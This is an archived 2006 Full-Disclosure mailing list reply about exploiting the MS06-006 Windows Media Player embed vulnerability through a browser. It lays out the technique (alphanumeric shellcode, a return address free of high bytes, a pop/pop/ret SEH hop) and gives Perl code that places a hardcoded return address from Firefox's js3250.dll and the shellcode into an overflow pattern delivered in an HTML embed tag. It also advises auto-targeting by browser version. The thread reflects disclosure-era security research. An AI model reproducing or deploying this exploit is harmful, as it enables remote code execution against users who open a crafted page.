[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <200602161723.23818.fdlist@digitaloffense.net>
Date: Thu Feb 16 23:23:34 2006
From: fdlist at digitaloffense.net (H D Moore)
Subject: MS06-06 Windows Media Player Exploitation
Still getting some annoying crashes (SEH trick in alphanum code is
annoying when you are trying to debug something...), but the basic
solution is:
1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted bytes
my $pattern = Pex::Text::PatternCreate(16384);
substr($pattern, 2086, 4, pack('V', 0x60082336)); # pop ebx, pop ebp, ret
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2090, length($shellcode), $shellcode);
$content = "<html><body><embed src=\"$pattern.wmv\"></body></html>";
Return address is from js3250.dlll in Firefox 1.5.0.1, you should
auto-target based on the browser version.
-HD
On Thursday 16 February 2006 16:26, c0ntex wrote:
> No exploit, just some basic research - anyone with 100% Ascii win32
> shellcode?
>
> http://open-security.org/winmedia/index.html
>
> --
>
> regards
> c0ntex
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists